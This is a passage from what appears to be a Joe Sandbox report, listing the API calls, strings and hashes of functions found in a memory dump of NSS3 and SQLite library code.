Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: bdf30515a906edf0993703bcb2f2eb310544f562a308a9252f9f0028a53b241e
Instruction ID: 5dd99fb0a78bbbafc3174fc3f8b9736ec452450a46bf463c86d804f8627accbe
Opcode Fuzzy Hash: bdf30515a906edf0993703bcb2f2eb310544f562a308a9252f9f0028a53b241e
Instruction Fuzzy Hash: 16510AB5E002155FEB219FA8DE81ABB37E89F15218F151834EC0997B42FB31ED1487E2

Function 6C7E6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C7E6ED8
sqlite3_value_text.NSS3(?,?), ref: 6C7E6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C7E6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C7E6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C7E6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C7E7010
sqlite3_value_blob.NSS3(?,?), ref: 6C7E701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C7E7052

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 4e7e8ff8e3955ea6123853aed79225510a2031c728d79ce5b6ea69a79051521d
Instruction ID: 3849491b4b49a34a7eb2e8f134ad272eabba8d014800d3d1e2bfac0defc5e7d5
Opcode Fuzzy Hash: 4e7e8ff8e3955ea6123853aed79225510a2031c728d79ce5b6ea69a79051521d
Instruction Fuzzy Hash: 6461D4B2E142098BDB00CF68DA447EEB7B2AF89308F284178D515AB751E7359E05CB90

Function 6C858F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C857313), ref: 6C858FBB

Part of subcall function 6C8507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7F8298,?,?,?,6C7EFCE5,?), ref: 6C8507BF
Part of subcall function 6C8507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8507E6
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C85081B
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C850825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C857313), ref: 6C859012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C857313), ref: 6C85903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C857313), ref: 6C85909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C857313), ref: 6C8590DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C857313), ref: 6C8590F1

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C857313), ref: 6C85906B

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C857313), ref: 6C859128

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 2ffae247cfc44a34c95de831024bfa1e69b59a9ea36500582a28c0cfe9c6f275
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: BF5107B0A002118FEBB0CF6ACE44B26B3F5AF44318F954C29D915C7751E7B2E826CB91

Function 6C842470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C842D7C,6C819192,?), ref: 6C84248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C8424A2
memset.VCRUNTIME140(6C842D7C,00000020,6C842D5C), ref: 6C84250E
memset.VCRUNTIME140(6C842D9C,00000020,6C842D7C), ref: 6C842535
memset.VCRUNTIME140(?,00000020,?), ref: 6C84255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C842583
PR_Unlock.NSS3(?), ref: 6C842594
PR_SetError.NSS3(00000000,00000000), ref: 6C8425AF

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 8f94de977668efd6db7f3eae946a7621c974a023aaf5baa3bc4f1bc018187a69
Instruction ID: efcd62c6565aa805e85873f949b8fadb5a48363dbd9875b97247687a78e2c80f
Opcode Fuzzy Hash: 8f94de977668efd6db7f3eae946a7621c974a023aaf5baa3bc4f1bc018187a69
Instruction Fuzzy Hash: 7B4125B1E082095BEB249F34CD987AA3774FB59308F258E28DC05D7652F774E684C690

Function 6C8405A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C8405DA

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

TlsGetValue.KERNEL32(00000000), ref: 6C84060C
EnterCriticalSection.KERNEL32 ref: 6C840629
TlsGetValue.KERNEL32(00000000), ref: 6C84066F
EnterCriticalSection.KERNEL32 ref: 6C84068C
PR_Unlock.NSS3 ref: 6C8406AA
PK11_GetNextSafe.NSS3 ref: 6C8406C3
PR_Unlock.NSS3 ref: 6C8406F9

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: 16c6402a7b2946f7c5aabdf1f2ae2bc0ac350e3330ca59f8073131366b8c16fe
Instruction ID: c03e1c0558c39fec7e0c9814906aab1307316af969c46873c00a0c22b16587c9
Opcode Fuzzy Hash: 16c6402a7b2946f7c5aabdf1f2ae2bc0ac350e3330ca59f8073131366b8c16fe
Instruction Fuzzy Hash: 50513CB4A0574ACFDB10EF69C68456ABBF0BF55308F10C92DD8999B701EB30E884CB91

Function 6C84A470 Relevance: 12.1, APIs: 8, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C84A4A6

Part of subcall function 6C850840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8508B4

PORT_Alloc_Util.NSS3(?), ref: 6C84A4EC

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C84A527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C84A56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C84A583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C84A596
free.MOZGLUE(?), ref: 6C84A5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C84A5B6

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID:
API String ID: 3906949479-0
Opcode ID: 8fe70952d0b3de655edd870d23b06aaff3d9ac2dbdd222e9145903cc8a12f69b
Instruction ID: 1c7b892ac086e2992e2793842f19e5cb4072da739a1cec7de007dccbcedf3dca
Opcode Fuzzy Hash: 8fe70952d0b3de655edd870d23b06aaff3d9ac2dbdd222e9145903cc8a12f69b
Instruction Fuzzy Hash: D841E631A043459FDB20DF99CE40BDABB71AF50308F15C868D8595FB52E731E919C7A1

Function 6C814E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C814E90
EnterCriticalSection.KERNEL32 ref: 6C814EA9
TlsGetValue.KERNEL32 ref: 6C814EC6
EnterCriticalSection.KERNEL32 ref: 6C814EDF
PL_HashTableLookup.NSS3 ref: 6C814EF8
PR_Unlock.NSS3 ref: 6C814F05
PR_Now.NSS3 ref: 6C814F13
PR_Unlock.NSS3 ref: 6C814F3A

Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07AD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07CD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07D6
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C77204A), ref: 6C7E07E4
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,6C77204A), ref: 6C7E0864
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7E0880
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C77204A), ref: 6C7E08CB
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08D7
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08FB

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 1fedb9124dcb502682c272f8ee279d7aadfccc9d16273d7502423999386f3f13
Instruction ID: 459cb5fba3253a8acb5d5c36b47ff3eb3e61f8ab0b29759821b31779b6d6f3ea
Opcode Fuzzy Hash: 1fedb9124dcb502682c272f8ee279d7aadfccc9d16273d7502423999386f3f13
Instruction Fuzzy Hash: 87415DB4A086058FCB10EF7CC18486ABBF0FF89318B118969DC599B711EB30E895CF91

Function 6C8525E0 Relevance: 12.1, APIs: 8, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C852610
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000), ref: 6C85261F

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C85263B
_wopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,0000010A,00000000,?,000000FF,00000000,00000000), ref: 6C85264A
free.MOZGLUE(00000000,?,?,00000000), ref: 6C852656
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C93DEB8), ref: 6C852676
_close.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 6C852684
free.MOZGLUE(00000000,?,000000FF,00000000,00000000), ref: 6C85268D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_close_fdopen_wopenmalloc
String ID:
API String ID: 3511306438-0
Opcode ID: ebd1068d1187220dc23fd6103a5e04f9aaa51c00a87b8898af0eaeac991812e7
Instruction ID: fc643ebe1ec8f9443edf862cf5289711f197502e17d5dc0eee0959ff88623984
Opcode Fuzzy Hash: ebd1068d1187220dc23fd6103a5e04f9aaa51c00a87b8898af0eaeac991812e7
Instruction Fuzzy Hash: BA11E6B17053122FFB5426258D5DA3B39EDEB41259F140938FC19C56C1FFA4CC2482A2

Function 6C774F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C774FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7751BB

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7751A5
misuse, xrefs: 6C7751AF
unable to delete/modify user-function due to active statements, xrefs: 6C7751DF
%s at line %d of [%.10s], xrefs: 6C7751B4

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 85fbb57a2fe4d660c8f4e85d8695205ac683ce31878ead9228dd0c45a8a375c0
Instruction ID: a347f05e35f614a6084c85357f450ff8de277ae3c3594813d33f0adb66e3f2ce
Opcode Fuzzy Hash: 85fbb57a2fe4d660c8f4e85d8695205ac683ce31878ead9228dd0c45a8a375c0
Instruction Fuzzy Hash: E771AD71B0420E9BDF10CF29EE84BAA77B5BF48348F184534ED099BA81D735E851CBA1

Function 6C7E2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C7E2D69

Strings

winSeekFile, xrefs: 6C7E2E9C
winTruncate2, xrefs: 6C7E2EF8
winTruncate1, xrefs: 6C7E2EBE
winUnmapfile1, xrefs: 6C7E2F55
winUnmapfile2, xrefs: 6C7E2F7F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 57ee0b35dc2e9b26fa726ccbf8053bb3cfe897cc7a66e692f59bb861427ad5d6
Instruction ID: a94f40772729373eb956d4730dc6ffd053b8509030a21bcdffd8aaf71ae46622
Opcode Fuzzy Hash: 57ee0b35dc2e9b26fa726ccbf8053bb3cfe897cc7a66e692f59bb861427ad5d6
Instruction Fuzzy Hash: 3F61AF72B002059FDB44DF68D988A6A77B1FF4D314F208638E9199B780EB31E906CB91

Function 6C83AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C83AB3E,?,?,?), ref: 6C83AC35

Part of subcall function 6C81CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C81CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C83AB3E,?,?,?), ref: 6C83AC55

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C83AB3E,?,?), ref: 6C83AC70

Part of subcall function 6C81E300: TlsGetValue.KERNEL32 ref: 6C81E33C
Part of subcall function 6C81E300: EnterCriticalSection.KERNEL32(?), ref: 6C81E350
Part of subcall function 6C81E300: PR_Unlock.NSS3(?), ref: 6C81E5BC
Part of subcall function 6C81E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C81E5CA
Part of subcall function 6C81E300: TlsGetValue.KERNEL32 ref: 6C81E5F2
Part of subcall function 6C81E300: EnterCriticalSection.KERNEL32(?), ref: 6C81E606
Part of subcall function 6C81E300: PORT_Alloc_Util.NSS3(?), ref: 6C81E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C83AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C83AB3E), ref: 6C83ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C83AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C83AD2B

Part of subcall function 6C81F360: TlsGetValue.KERNEL32(00000000,?,6C83A904,?), ref: 6C81F38B
Part of subcall function 6C81F360: EnterCriticalSection.KERNEL32(?,?,?,6C83A904,?), ref: 6C81F3A0
Part of subcall function 6C81F360: PR_Unlock.NSS3(?,?,?,?,6C83A904,?), ref: 6C81F3D3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 6a0501d1cc7794e17a0083f0e7b344fffc19ef80168251c64daf64dc9a848c04
Instruction ID: c7f31e415dbab76fb47bf61ddab383bc07d23c875417b1e082b746980cf32be5
Opcode Fuzzy Hash: 6a0501d1cc7794e17a0083f0e7b344fffc19ef80168251c64daf64dc9a848c04
Instruction Fuzzy Hash: AD3128B1E001165FEF208EA98D405EFB7A6AFC4318B199938E81857B40EB319C1687E1

Function 6C818C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C818C7C

Part of subcall function 6C8B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C900A27), ref: 6C8B9DC6
Part of subcall function 6C8B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C900A27), ref: 6C8B9DD1
Part of subcall function 6C8B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C818CB0
TlsGetValue.KERNEL32 ref: 6C818CD1
EnterCriticalSection.KERNEL32(?), ref: 6C818CE5
PR_Unlock.NSS3(?), ref: 6C818D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C818D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C818D93

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 6880e665ffd1e66ec70c89c0d9437f06912874d3db31e60b69f84ae35a087eac
Instruction ID: aa54427a537091713dcef0604f29bced2e22443c8a12f66b21b16fb2bcf84bc1
Opcode Fuzzy Hash: 6880e665ffd1e66ec70c89c0d9437f06912874d3db31e60b69f84ae35a087eac
Instruction Fuzzy Hash: 04314771E09706AFD7209F68CD4679A77B0BF15319F25093AEA0967F90D730A924CBC1

Function 6C838500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C8395DC,00000000,00000000,00000000,?,6C8395DC,00000000,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C838517

Part of subcall function 6C84BE30: SECOID_FindOID_Util.NSS3(6C80311B,00000000,?,6C80311B,?), ref: 6C84BE44

